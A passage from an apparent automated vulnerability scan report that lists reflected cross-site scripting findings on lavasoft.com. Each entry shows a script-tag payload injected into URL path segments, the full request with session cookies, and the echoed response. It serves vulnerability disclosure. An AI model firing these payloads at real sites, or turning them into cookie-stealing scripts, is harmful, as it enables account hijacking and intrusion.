User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18210
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/systema7668'><script>alert(1)</script>dd59b0cd693/system-menus.css'>
...[SNIP]...

1.205. http://www.lavasoft.com/mylavasoft/modules/system/system-menus.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/system-menus.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 11aec'><script>alert(1)</script>9250b34dab5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/system/system-menus.css11aec'><script>alert(1)</script>9250b34dab5?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18210
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/system/system-menus.css11aec'><script>alert(1)</script>9250b34dab5'>
...[SNIP]...

1.206. http://www.lavasoft.com/mylavasoft/modules/system/system.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/system.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e9be'><script>alert(1)</script>939406975b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft4e9be'><script>alert(1)</script>939406975b6/modules/system/system.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10629
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft4e9be'><script>alert(1)</script>939406975b6/modules/system/system.css?w'>
...[SNIP]...

1.207. http://www.lavasoft.com/mylavasoft/modules/system/system.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/system.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 806ea'><script>alert(1)</script>eb3bcf32647 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules806ea'><script>alert(1)</script>eb3bcf32647/system/system.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18236
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules806ea'><script>alert(1)</script>eb3bcf32647/system/system.css'>
...[SNIP]...

1.208. http://www.lavasoft.com/mylavasoft/modules/system/system.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/system.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f333f'><script>alert(1)</script>8c4d44176a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/systemf333f'><script>alert(1)</script>8c4d44176a9/system.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18198
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/systemf333f'><script>alert(1)</script>8c4d44176a9/system.css'>
...[SNIP]...

1.209. http://www.lavasoft.com/mylavasoft/modules/system/system.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/system/system.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f4b7b'><script>alert(1)</script>d12d2c52918 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/system/system.cssf4b7b'><script>alert(1)</script>d12d2c52918?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18198
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/system/system.cssf4b7b'><script>alert(1)</script>d12d2c52918'>
...[SNIP]...

1.210. http://www.lavasoft.com/mylavasoft/modules/user/user.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/user/user.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7ba62'><script>alert(1)</script>b152347a317 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft7ba62'><script>alert(1)</script>b152347a317/modules/user/user.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10625
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft7ba62'><script>alert(1)</script>b152347a317/modules/user/user.css?w'>
...[SNIP]...

1.211. http://www.lavasoft.com/mylavasoft/modules/user/user.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/user/user.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload faf8b'><script>alert(1)</script>aac192f3126 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modulesfaf8b'><script>alert(1)</script>aac192f3126/user/user.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18347
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modulesfaf8b'><script>alert(1)</script>aac192f3126/user/user.css'>
...[SNIP]...

1.212. http://www.lavasoft.com/mylavasoft/modules/user/user.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/user/user.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e50cb'><script>alert(1)</script>a488ec66a24 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/usere50cb'><script>alert(1)</script>a488ec66a24/user.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18309
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/usere50cb'><script>alert(1)</script>a488ec66a24/user.css'>
...[SNIP]...

1.213. http://www.lavasoft.com/mylavasoft/modules/user/user.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/user/user.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a545a'><script>alert(1)</script>d88e24eab1c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/user/user.cssa545a'><script>alert(1)</script>d88e24eab1c?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18309
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/user/user.cssa545a'><script>alert(1)</script>d88e24eab1c'>
...[SNIP]...

1.214. http://www.lavasoft.com/mylavasoft/modules/user/user.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/user/user.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 49b0c'><script>alert(1)</script>7c44f2e80ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft49b0c'><script>alert(1)</script>7c44f2e80ad/modules/user/user.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:16 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:16 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10624
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft49b0c'><script>alert(1)</script>7c44f2e80ad/modules/user/user.js?w'>
...[SNIP]...

1.215. http://www.lavasoft.com/mylavasoft/modules/user/user.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/user/user.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7b64a'><script>alert(1)</script>f62241c0c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules7b64a'><script>alert(1)</script>f62241c0c7/user/user.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:28 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18343
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules7b64a'><script>alert(1)</script>f62241c0c7/user/user.js'>
...[SNIP]...

1.216. http://www.lavasoft.com/mylavasoft/modules/user/user.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/user/user.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 183e2'><script>alert(1)</script>bc10062b1a0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/user183e2'><script>alert(1)</script>bc10062b1a0/user.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
